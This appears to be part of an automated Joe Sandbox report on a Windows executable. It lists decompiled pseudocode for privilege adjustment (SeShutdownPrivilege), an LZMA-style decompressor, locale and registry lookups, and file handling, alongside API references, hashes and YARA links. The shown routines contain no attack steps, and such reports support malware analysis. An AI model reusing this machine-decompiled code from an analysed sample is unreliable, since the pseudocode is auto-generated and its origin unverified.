					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					_t6 = GetLastError();
					if(_t6 != 0) {
						return E00408F54();
					}
				}
				_push(0);
				_push(2);
				L004045B0();
				if(_t6 == 0) {
					return E00408F54();
				}
				return _t6;
			}

0x00408f7e
0x00408f90
0x00000000
0x00408f92
0x00408fa5
0x00408faa
0x00408fb2
0x00408fcc
0x00408fd1
0x00408fd8
0x00000000
0x00408fda
0x00408fd8
0x00408fe1
0x00408fe3
0x00408fe5
0x00408fec
0x00000000
0x00408fee
0x00408ff6

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 00408F83
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00408F89
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00408FA5
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00408FCC
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00408FD1

Part of subcall function 00408F54: MessageBoxA.USER32 ref: 00408F6E

6D744E70.USER32(00000002,00000000), ref: 00408FE5

Strings

SeShutdownPrivilege, xrefs: 00408F9E

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentD744ErrorLastLookupMessageOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 4041735982-3733053543
Opcode ID: 83f6bd937160e8a7ec3cf9db887a64d31fa1b7c661ec195b1942936c1731c410
Instruction ID: c72e9f2ad070c17353680827fa8b856fe60a41768db99086813ff3da149a21e3
Opcode Fuzzy Hash: 83f6bd937160e8a7ec3cf9db887a64d31fa1b7c661ec195b1942936c1731c410
Instruction Fuzzy Hash: 1EF0ECA064430366E610B6728E07F2B61895F90B09F50483FBB94B51C3DEBD9449966F

Uniqueness

Uniqueness Score: -1.00%

Function 004081C8 Relevance: 1.7, Strings: 1, Instructions: 487
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E004081C8(void* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				char _v25;
				void* _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char* _v72;
				intOrPtr _v76;
				char _v80;
				signed int _v84;
				char _v85;
				char _v92;
				signed int _v96;
				signed int _v100;
				char* _v104;
				signed int _v108;
				signed int _v112;
				void _v132;
				intOrPtr _v148;
				signed int _t305;
				void* _t310;
				signed int _t312;
				signed int _t316;
				void* _t324;
				signed int _t328;
				signed int _t333;
				intOrPtr _t349;
				signed int _t360;
				signed int _t364;
				intOrPtr _t373;
				intOrPtr _t375;
				void* _t388;
				signed int _t398;
				char _t400;
				signed int _t404;
				void* _t414;
				void* _t423;
				void* _t430;
				char _t456;
				signed int _t503;
				signed int _t524;
				intOrPtr _t528;
				signed int _t530;
				intOrPtr _t532;
				signed int _t533;
				signed int _t537;
				void* _t539;
				intOrPtr* _t540;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = _v8;
				_t456 = _v8 + 0x58;
				_v24 = _t456;
				memcpy( &_v132, _v20, 7 << 2);
				_t540 = _t539 + 0xc;
				_t404 =  *(_v20 + 0x4c);
				_t530 =  *((intOrPtr*)(_v20 + 0x30));
				asm("lock mov edx, [eax+0x34]");
				_v32 = _t456;
				_v36 =  *((intOrPtr*)(_v20 + 0x38));
				_v40 =  *((intOrPtr*)(_v20 + 0x3c));
				_v44 = 0;
				_v48 = (1 <<  *(_v20 + 0x48)) - 1;
				_v52 = (1 <<  *(_v20 + 0x44)) - 1;
				_v56 =  *((intOrPtr*)(_v20 + 0x40));
				_v60 =  *(_v20 + 0x50);
				_t414 = _v20;
				_v68 =  *((intOrPtr*)(_t414 + 0x28));
				_v64 =  *((intOrPtr*)(_t414 + 0x2c));
				_v72 =  *((intOrPtr*)(_v20 + 0x1c));
				_v76 =  *((intOrPtr*)(_v20 + 0x20));
				_t524 =  *((intOrPtr*)(_v20 + 0x24));
				if(_v76 == 0) {
					_v72 =  &_v80;
					_v76 = 1;
					_v80 =  *((intOrPtr*)(_v20 + 0x54));
				}
				if(_v60 != 0xffffffff) {
					_v104 = _v12 + _v44;
					while(1) {
						__eflags = _v60;
						if(_v60 == 0) {
							break;
						}
						__eflags = _v44 - _v16;
						if(_v44 < _v16) {
							_t398 = _t524 - _t530;
							__eflags = _t398 - _v76;
							if(_t398 >= _v76) {
								_t398 = _t398 + _v76;
								__eflags = _t398;
							}
							_t400 =  *((intOrPtr*)(_v72 + _t398));
							 *((char*)(_v72 + _t524)) = _t400;
							 *_v104 = _t400;
							_v44 = _v44 + 1;
							_v104 = _v104 + 1;
							_t524 = _t524 + 1;
							__eflags = _t524 - _v76;
							if(_t524 == _v76) {
								_t524 = 0;
								__eflags = 0;
							}
							_t74 =  &_v60;
							 *_t74 = _v60 - 1;
							__eflags =  *_t74;
							continue;
						}
						break;
					}
					__eflags = _t524;
					if(_t524 != 0) {
						_v25 =  *((intOrPtr*)(_v72 + _t524 - 1));
					} else {
						_v25 =  *((intOrPtr*)(_v72 + _v76 - 1));
					}
					__eflags = 0;
					 *_a4 = 0;
					while(1) {
						L17:
						_v104 = _v12 + _v44;
						__eflags = _v44 - _v16;
						if(_v44 >= _v16) {
							break;
						} else {
							goto L18;
						}
						while(1) {
							L18:
							_v84 = _v68 + _v44 & _v48;
							__eflags = _v112;
							if(_v112 != 0) {
								break;
							}
							__eflags = _v108;
							if(_v108 == 0) {
								_t305 = E00407EE4((_t404 << 4) + (_t404 << 4) + _v24 + _v84 + _v84,  &_v132);
								__eflags = _t305;
								if(_t305 != 0) {
									_t310 = E00407EE4(_t404 + _t404 + _v24 + 0x180,  &_v132);
									__eflags = _t310 != 1;
									if(_t310 != 1) {
										_t177 =  &_v36; // 0x407d67
										_v40 =  *_t177;
										_v36 = _v32;
										_v32 = _t530;
										__eflags = _t404 - 7;
										if(__eflags >= 0) {
											_t312 = 0xa;
										} else {
											_t312 = 7;
										}
										_t404 = _t312;
										_v60 = E00408094(_v24 + 0x664, _v84,  &_v132, __eflags);
										_t430 =  &_v132;
										__eflags = _v60 - 4;
										if(_v60 >= 4) {
											_t316 = 3;
										} else {
											_t316 = _v60;
										}
										_v96 = E00407F6C((_t316 << 6) + (_t316 << 6) + _v24 + 0x360, _t430, 6);
										__eflags = _v96 - 4;
										if(_v96 < 4) {
											_t533 = _v96;
										} else {
											_v100 = (_v96 >> 1) - 1;
											_t448 = _v100;
											_t537 = (_v96 & 0x00000001 | 0x00000002) << _v100;
											__eflags = _v96 - 0xe;
											if(_v96 >= 0xe) {
												_t333 = E00407E84( &_v132, _t448, _v100 + 0xfffffffc);
												_t533 = _t537 + (_t333 << 4) + E00407FB0(_v24 + 0x644,  &_v132, 4);
											} else {
												_t533 = _t537 + E00407FB0(_t537 + _t537 + _v24 + 0x560 - _v96 + _v96 + 0xfffffffe,  &_v132, _v100);
											}
										}
										_t530 = _t533 + 1;
										__eflags = _t530;
										L72:
										__eflags = _t530;
										if(_t530 != 0) {
											_push(0);
											_push(_t530);
											_t324 = _v44 + _v68;
											asm("adc edx, [ebp-0x3c]");
											__eflags = 0 - _v148;
											if(__eflags == 0) {
												__eflags = _t324 -  *_t540;
											}
											if(__eflags < 0) {
												L78:
												return 1;
											} else {
												__eflags = _t530 - _v76;
												if(_t530 <= _v76) {
													_t211 =  &_v60;
													 *_t211 = _v60 + 2;
													__eflags =  *_t211;
													while(1) {
														_t328 = _t524 - _t530;
														__eflags = _t328 - _v76;
														if(_t328 >= _v76) {
															_t328 = _t328 + _v76;
															__eflags = _t328;
														}
														_v25 =  *((intOrPtr*)(_v72 + _t328));
														 *((char*)(_v72 + _t524)) = _v25;
														_t524 = _t524 + 1;
														__eflags = _t524 - _v76;
														if(_t524 == _v76) {
															_t524 = 0;
															__eflags = 0;
														}
														 *_v104 = _v25;
														_v44 = _v44 + 1;
														_v104 = _v104 + 1;
														_v60 = _v60 - 1;
														__eflags = _v60;
														if(_v60 == 0) {
															break;
														}
														__eflags = _v44 - _v16;
														if(_v44 < _v16) {
															continue;
														}
														break;
													}
													L86:
													__eflags = _v44 - _v16;
													if(_v44 < _v16) {
														continue;
													}
													goto L87;
												}
												goto L78;
											}
										}
										_v60 = 0xffffffff;
										goto L87;
									}
									_t349 = E00407EE4(_t404 + _t404 + _v24 + 0x198,  &_v132);
									__eflags = _t349;
									if(_t349 != 0) {
										__eflags = E00407EE4(_t404 + _t404 + _v24 + 0x1b0,  &_v132);
										if(__eflags != 0) {
											__eflags = E00407EE4(_t404 + _t404 + _v24 + 0x1c8,  &_v132);
											if(__eflags != 0) {
												_t360 = _v40;
												_t168 =  &_v36; // 0x407d67
												_v40 =  *_t168;
											} else {
												_t166 =  &_v36; // 0x407d67
												_t360 =  *_t166;
											}
											_v36 = _v32;
										} else {
											_t360 = _v32;
										}
										_v32 = _t530;
										_t530 = _t360;
										L56:
										_v60 = E00408094(_v24 + 0xa68, _v84,  &_v132, __eflags);
										__eflags = _t404 - 7;
										if(_t404 >= 7) {
											_t364 = 0xb;
										} else {
											_t364 = 8;
										}
										_t404 = _t364;
										goto L72;
									}
									__eflags = E00407EE4((_t404 << 4) + (_t404 << 4) + _v24 + _v84 + _v84 + 0x1e0,  &_v132);
									if(__eflags != 0) {
										goto L56;
									}
									_t373 = _v44 + _v68;
									asm("adc edx, [ebp-0x3c]");
									__eflags = 0;
									if(0 != 0) {
										L41:
										__eflags = _t404 - 7;
										if(_t404 >= 7) {
											_t503 = 0xb;
										} else {
											_t503 = 9;
										}
										_t404 = _t503;
										_t375 = _t524 - _t530;
										__eflags = _t375 - _v76;
										if(_t375 >= _v76) {
											_t375 = _t375 + _v76;
											__eflags = _t375;
										}
										_v25 =  *((intOrPtr*)(_v72 + _t375));
										 *((char*)(_v72 + _t524)) = _v25;
										_t524 = _t524 + 1;
										__eflags = _t524 - _v76;
										if(_t524 == _v76) {
											_t524 = 0;
											__eflags = 0;
										}
										 *_v104 = _v25;
										_v44 = _v44 + 1;
										goto L17;
									}
									__eflags = _t373;
									if(_t373 != 0) {
										goto L41;
									}
									return 1;
								}
								_t388 = (((_v68 + _v44 & _v52) << _v56) + (0 >> 8 - _v56) << 8) + (((_v68 + _v44 & _v52) << _v56) + (0 >> 8 - _v56) << 8) * 2 + (((_v68 + _v44 & _v52) << _v56) + (0 >> 8 - _v56) << 8) + (((_v68 + _v44 & _v52) << _v56) + (0 >> 8 - _v56) << 8) * 2 + _v24 + 0xe6c;
								__eflags = _t404 - 7;
								if(__eflags < 0) {
									_v25 = E00407FF4(_t388,  &_v132, __eflags);
								} else {
									_v92 = _t524 - _t530;
									__eflags = _v92 - _v76;
									if(__eflags >= 0) {
										_t118 =  &_v92;
										 *_t118 = _v92 + _v76;
										__eflags =  *_t118;
									}
									_v85 =  *((intOrPtr*)(_v72 + _v92));
									_v25 = E00408020(_t388, _v85,  &_v132, __eflags);
								}
								 *_v104 = _v25;
								_v44 = _v44 + 1;
								_v104 = _v104 + 1;
								 *((char*)(_v72 + _t524)) = _v25;
								_t524 = _t524 + 1;
								__eflags = _t524 - _v76;
								if(_t524 == _v76) {
									_t524 = 0;
									__eflags = 0;
								}
								__eflags = _t404 - 4;
								if(_t404 >= 4) {
									__eflags = _t404 - 0xa;
									if(_t404 >= 0xa) {
										_t404 = _t404 - 6;
									} else {
										_t404 = _t404 - 3;
									}
								} else {
									_t404 = 0;
								}
								goto L86;
							}
							return 1;
						}
						return _v112;
					}
					L87:
					memcpy(_v20,  &_v132, 7 << 2);
					_t528 = _t524;
					_t532 = _t530;
					 *((intOrPtr*)(_v20 + 0x24)) = _t528;
					_t423 = _v20;
					asm("adc edx, [ebp-0x3c]");
					 *((intOrPtr*)(_t423 + 0x28)) = _v44 + _v68;
					 *((intOrPtr*)(_t423 + 0x2c)) = 0;
					 *((intOrPtr*)(_v20 + 0x30)) = _t532;
					 *((intOrPtr*)(_v20 + 0x34)) = _v32;
					_t251 =  &_v36; // 0x407d67
					 *((intOrPtr*)(_v20 + 0x38)) =  *_t251;
					 *((intOrPtr*)(_v20 + 0x3c)) = _v40;
					 *(_v20 + 0x4c) = _t404;
					 *(_v20 + 0x50) = _v60;
					 *((char*)(_v20 + 0x54)) = _v80;
					 *_a4 = _v44;
					__eflags = 0;
					return 0;
				}
				 *_a4 = 0;
				return 0;
			}

0x004081d1
0x004081d4
0x004081d7
0x004081e0
0x004081e6
0x004081e9
0x004081f6
0x004081f6
0x004081fb
0x00408201
0x00408206
0x0040820a
0x00408213
0x0040821e
0x00408221
0x00408232
0x00408243
0x0040824c
0x00408255
0x00408258
0x0040825e
0x00408264
0x0040826d
0x00408276
0x00408280
0x00408283
0x00408288
0x0040828b
0x00408298
0x00408298
0x0040829f
0x004082b8
0x004082ed
0x004082ed
0x004082f1
0x00000000
0x00000000
0x004082f6
0x004082f9
0x004082bf
0x004082c1
0x004082c4
0x004082c6
0x004082c6
0x004082c6
0x004082d3
0x004082d4
0x004082da
0x004082dc
0x004082df
0x004082e2
0x004082e3
0x004082e6
0x004082e8
0x004082e8
0x004082e8
0x004082ea
0x004082ea
0x004082ea
0x00000000
0x004082ea
0x00000000
0x004082f9
0x004082fb
0x004082fd
0x00408315
0x004082ff
0x00408309
0x00408309
0x0040831b
0x0040831d
0x0040831f
0x0040831f
0x00408328
0x0040832e
0x00408331
0x00000000
0x00000000
0x00000000
0x00000000
0x00408337
0x00408337
0x00408340
0x00408343
0x00408347
0x00000000
0x00000000
0x00408351
0x00408355
0x00408375
0x0040837a
0x0040837c
0x00408441
0x00408446
0x00408447
0x00408575
0x00408578
0x0040857e
0x00408581
0x00408584
0x00408587
0x00408590
0x00408589
0x00408589
0x00408589
0x00408595
0x004085aa
0x004085ad
0x004085b0
0x004085b4
0x004085bb
0x004085b6
0x004085b6
0x004085b6
0x004085d7
0x004085da
0x004085de
0x0040864e
0x004085e0
0x004085e6
0x004085e9
0x004085f5
0x004085f7
0x004085fb
0x0040862b
0x0040864a
0x004085fd
0x0040861e
0x0040861e
0x004085fb
0x00408651
0x00408651
0x00408652
0x00408652
0x00408654
0x00408666
0x00408667
0x0040866d
0x00408670
0x00408673
0x00408677
0x00408679
0x00408679
0x0040867e
0x00408685
0x00000000
0x00408680
0x00408680
0x00408683
0x0040868f
0x0040868f
0x0040868f
0x00408693
0x00408695
0x00408697
0x0040869a
0x0040869c
0x0040869c
0x0040869c
0x004086a5
0x004086ae
0x004086b1
0x004086b2
0x004086b5
0x004086b7
0x004086b7
0x004086b7
0x004086bf
0x004086c1
0x004086c4
0x004086c7
0x004086ca
0x004086ce
0x00000000
0x00000000
0x004086d3
0x004086d6
0x00000000
0x00000000
0x00000000
0x004086d6
0x004086d8
0x004086db
0x004086de
0x00000000
0x00000000
0x00000000
0x004086de
0x00000000
0x00408683
0x0040867e
0x00408656
0x00000000
0x00408656
0x0040845c
0x00408461
0x00408463
0x0040850d
0x0040850f
0x0040852a
0x0040852c
0x00408533
0x00408536
0x00408539
0x0040852e
0x0040852e
0x0040852e
0x0040852e
0x0040853f
0x00408511
0x00408511
0x00408511
0x00408542
0x00408545
0x00408547
0x0040855a
0x0040855d
0x00408560
0x00408569
0x00408562
0x00408562
0x00408562
0x0040856e
0x00000000
0x0040856e
0x00408487
0x00408489
0x00000000
0x00000000
0x00408494
0x00408497
0x0040849a
0x0040849d
0x004084ae
0x004084ae
0x004084b1
0x004084ba
0x004084b3
0x004084b3
0x004084b3
0x004084bf
0x004084c3
0x004084c5
0x004084c8
0x004084ca
0x004084ca
0x004084ca
0x004084d3
0x004084dc
0x004084df
0x004084e0
0x004084e3
0x004084e5
0x004084e5
0x004084e5
0x004084ed
0x004084ef
0x00000000
0x004084ef
0x0040849f
0x004084a2
0x00000000
0x00000000
0x00000000
0x004084a4
0x004083ac
0x004083b1
0x004083b4
0x004083ef
0x004083b6
0x004083ba
0x004083c0
0x004083c3
0x004083c8
0x004083c8
0x004083c8
0x004083c8
0x004083d4
0x004083e2
0x004083e2
0x004083f8
0x004083fa
0x004083fd
0x00408406
0x00408409
0x0040840a
0x0040840d
0x0040840f
0x0040840f
0x0040840f
0x00408411
0x00408414
0x0040841d
0x00408420
0x0040842a
0x00408422
0x00408422
0x00408422
0x00408416
0x00408416
0x00408416
0x00000000
0x00408414
0x00000000
0x00408357
0x00000000
0x00408349
0x004086e4
0x004086f3
0x004086f8
0x004086f9
0x004086fc
0x00408702
0x00408708
0x0040870b
0x0040870e
0x00408714
0x0040871d
0x00408723
0x00408726
0x0040872f
0x00408735
0x0040873e
0x00408747
0x00408750
0x00408752
0x00000000
0x00408752
0x004082a6
0x00000000

Strings

g}@, xrefs: 00408723, 00408575, 00408536, 0040852E

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: g}@
API String ID: 0-1586774684
Opcode ID: 8d46861f72bd8009182a5df1658e23b09de12010c81d0541c91a6dece14fe47d
Instruction ID: 29ac6ee7aeb58910d702f0d07e3e3cb2ca8e6f4e35164c68233af48c971c23aa
Opcode Fuzzy Hash: 8d46861f72bd8009182a5df1658e23b09de12010c81d0541c91a6dece14fe47d
Instruction Fuzzy Hash: DA223B75E042598FCB04CF99C980AEEBBB2FF88314F14456AD855BB385DB38A942CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00405214 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00405214(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}

0x00405217
0x00405218
0x0040522e
0x00405235
0x00405230
0x00405230
0x00405230
0x0040523b

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00405416,?,?,?,00000000,004055C8), ref: 00405227

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 932cf14b9e230fbd5ad0920958dc4156f0791a313a63ab211e2034feafd5de3d
Instruction ID: 4f0bdbd3f8ded7ed1a25268213793bcb0e052a54da759137329d461c41add029
Opcode Fuzzy Hash: 932cf14b9e230fbd5ad0920958dc4156f0791a313a63ab211e2034feafd5de3d
Instruction Fuzzy Hash: 8AD05EB630D2502AE324559B2D85EBB4BACCEC57A4F14407EF648D6241D2248C079B76

Uniqueness

Uniqueness Score: -1.00%

Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004026C4() {
				void* _v14;
				void* _v16;
				struct _SYSTEMTIME _v28;
				signed int _t13;

				GetSystemTime( &_v28);
				_t13 = ((_v28.wHour & 0x0000ffff) * 0x3c + _v28.wMinute) * 0x3c * 0x3e8;
				 *0x40b02c = _t13;
				return _t13;
			}

0x004026ce
0x004026f3
0x004026f5
0x004026fe

APIs

GetSystemTime.KERNEL32(?), ref: 004026CE

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: SystemTime
String ID:
API String ID: 2656138-0
Opcode ID: ea6675ebeb63a0a9a47573394461451ad3244f368073b02e8c46e04122ef07d3
Instruction ID: 2fd9a68c0dbde603d2fbf043753412ebb29498d380aade495149b20e3fa82795
Opcode Fuzzy Hash: ea6675ebeb63a0a9a47573394461451ad3244f368073b02e8c46e04122ef07d3
Instruction Fuzzy Hash: 4FE04F21E0010A42C704ABA5CD435FDF7AEEB95600B044172A418E92E0F631C251C788

Uniqueness

Uniqueness Score: -1.00%

Function 00405CB0 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CB0() {
				intOrPtr _v132;
				int _t2;
				intOrPtr _t3;
				struct _OSVERSIONINFOA* _t4;

				_t4->dwOSVersionInfoSize = 0x94;
				_t2 = GetVersionExA(_t4);
				if(_t2 != 0) {
					_t3 = _v132;
					 *0x40a07c = _t3;
					return _t3;
				}
				return _t2;
			}

0x00405cb6
0x00405cbe
0x00405cc5
0x00405cc7
0x00405ccb
0x00000000
0x00405ccb
0x00405cd6

APIs

GetVersionExA.KERNEL32(?,004065AC,00000000,004065BA,?,?,?,?,?,004096AC), ref: 00405CBE

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 7fe8f477311258aab5f7ad0fd2ac618af5bf688ee042f3b164b7d17cd6e24d04
Instruction ID: 6961960961ae02171bebdc999c22018aeffe225005ffe8b0eab140491a1b62f0
Opcode Fuzzy Hash: 7fe8f477311258aab5f7ad0fd2ac618af5bf688ee042f3b164b7d17cd6e24d04
Instruction Fuzzy Hash: 47C0807040470147E3105F35DC01B1732D46744314F84053DE9E4E13D1E77C80114FAB

Uniqueness

Uniqueness Score: -1.00%

Function 00406DE4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86
registryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00406DE4(void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t49;
				intOrPtr _t63;
				void* _t71;

				_v20 = 0;
				_v12 = 0;
				_push(_t71);
				_push(0x406ee9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t71 + 0xfffffff0;
				_push("GetUserDefaultUILanguage");
				_t21 = GetModuleHandleA("kernel32.dll");
				_push(_t21);
				L004044F8();
				_t49 = _t21;
				if(_t49 == 0) {
					if( *0x40a07c != 2) {
						if(E00406DAC(0, "Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v8, 1, 0) == 0) {
							E00406DA0();
							RegCloseKey(_v8);
						}
					} else {
						if(E00406DAC(0, ".DEFAULT\\Control Panel\\International", 0x80000003,  &_v8, 1, 0) == 0) {
							E00406DA0();
							RegCloseKey(_v8);
						}
					}
					E0040322C( &_v20, E00406F8C);
					E004032FC( &_v20, _v12);
					E004027B4(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					_t49->i();
				}
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E00406EF0);
				E00403198( &_v20);
				return E00403198( &_v12);
			}

0x00406def
0x00406df2
0x00406df7
0x00406df8
0x00406dfd
0x00406e00
0x00406e03
0x00406e0d
0x00406e12
0x00406e13
0x00406e18
0x00406e1c
0x00406e2e
0x00406e83
0x00406e90
0x00406e99
0x00406e99
0x00406e30
0x00406e4b
0x00406e58
0x00406e61
0x00406e61
0x00406e4b
0x00406ea6
0x00406eb1
0x00406ebc
0x00406ec7
0x00406ec7
0x00406e1e
0x00406e1e
0x00406e20
0x00406ecd
0x00406ed0
0x00406ed3
0x00406edb
0x00406ee8

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00406EE9,?,0040BDC8), ref: 00406E0D
6D2B5550.KERNEL32(00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00406EE9,?,0040BDC8), ref: 00406E13
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00406EE9,?,0040BDC8), ref: 00406E61

Strings

Locale, xrefs: 00406E50
Control Panel\Desktop\ResourceLocale, xrefs: 00406E70
GetUserDefaultUILanguage, xrefs: 00406E03
.DEFAULT\Control Panel\International, xrefs: 00406E38
kernel32.dll, xrefs: 00406E08

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: B5550CloseHandleModule
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 988726543-2401316094
Opcode ID: 88167434d8b9e8ca4c5cf09045fd59891a0fc668b074b158b0db72b57aa501f7
Instruction ID: 29e02ae748a12762089417844227ba249160e8fc10eb37246adaf5d688aa78a8
Opcode Fuzzy Hash: 88167434d8b9e8ca4c5cf09045fd59891a0fc668b074b158b0db72b57aa501f7
Instruction Fuzzy Hash: EA216134A00309ABCB10EAA5DC42B9F77A9AF44304F61447BA511F72C5DB7CAA1587A8

Uniqueness

Uniqueness Score: -1.00%

Function 00403B3B Relevance: 15.1, APIs: 10, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00403B3B(void** __eax) {
				void* _t25;
				void* _t26;
				void* _t27;
				long _t30;
				void* _t33;
				void* _t35;
				long _t36;
				int _t39;
				void* _t41;
				void* _t47;
				void* _t48;
				long _t49;
				long _t50;
				void* _t53;
				void** _t54;
				DWORD* _t55;

				_t54 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				_t25 =  *((intOrPtr*)(__eax + 4)) - 0xd7b1;
				if(_t25 == 0) {
					_t26 = 0x80000000;
					_t50 = 2;
					_t49 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = E00403ACC;
					L8:
					_t54[9] = 0x403b23;
					_t54[8] = E00403AF3;
					if(_t54[0x12] == 0) {
						_t54[9] = E00403AF3;
						if(_t54[1] == 0xd7b2) {
							_t27 = GetStdHandle(0xfffffff5);
						} else {
							_t27 = GetStdHandle(0xfffffff6);
						}
						if(_t27 == 0xffffffff) {
							L35:
							_t54[1] = 0xd7b0;
							return GetLastError();
						} else {
							 *_t54 = _t27;
							L28:
							if(_t54[1] == 0xd7b1) {
								L32:
								return 0;
							}
							_t30 = GetFileType( *_t54);
							if(_t30 == 0) {
								CloseHandle( *_t54);
								_t54[1] = 0xd7b0;
								return 0x69;
							}
							if(_t30 == 2) {
								_t54[8] = E00403AF6;
							}
							goto L32;
						}
					}
					_push(0);
					_push(0x80);
					_push(_t49);
					_push(0);
					_push(_t50);
					_push(_t26);
					_t33 =  &(_t54[0x12]);
					_push(_t33);
					L00401184();
					if(_t33 == 0xffffffff) {
						goto L35;
					}
					 *_t54 = _t33;
					if(_t54[1] != 0xd7b3) {
						goto L28;
					}
					_t54[1] = _t54[1] - 1;
					_t35 = GetFileSize( *_t54, 0) + 1;
					if(_t35 == 0) {
						goto L35;
					}
					_t36 = _t35 - 0x81;
					if(_t36 < 0) {
						_t36 = 0;
					}
					if(SetFilePointer( *_t54, _t36, 0, 0) + 1 == 0) {
						goto L35;
					} else {
						_t39 = ReadFile( *_t54,  &(_t54[0x53]), 0x80, _t55, 0);
						_t53 = 0;
						if(_t39 != 1) {
							goto L35;
						}
						_t41 = 0;
						while(_t41 < _t53) {
							if( *((char*)(_t54 + _t41 + 0x14c)) == 0x1a) {
